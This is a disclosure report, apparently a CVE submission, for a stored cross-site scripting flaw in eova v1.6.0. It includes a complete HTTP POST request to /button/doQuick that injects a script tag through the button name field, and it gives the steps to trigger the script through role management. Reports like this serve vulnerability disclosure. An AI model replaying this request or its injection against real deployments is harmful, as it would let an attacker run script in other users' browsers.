[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in eova. Because the form submission did not effectively process the special characters entered by the user, the malicious JS code was executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://gitee.com/eova/eova

[Affected Product Code Base]
v1.6.0

[Affected Component]
POST /button/doQuick HTTP/1.1
Host: localhost:8700
Content-Length: 147
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8700
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8700/button/quick/biz_demo_tree_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D8FBC740992D82D7A03C51EC3BBFEF12
Connection: close

menu_code=biz_demo_tree_code&icon=eova-icon0&name=12%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&ui=%2FTologin&uri=&bs=%2FtoLogin&group_num=0&role=1

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability proof]
Quickly add a button, and enter the malicious JS code in the button name information box.

Enter the system management - role management page, select a role for authorization, open the icon display list, and trigger the XSS pop-up window.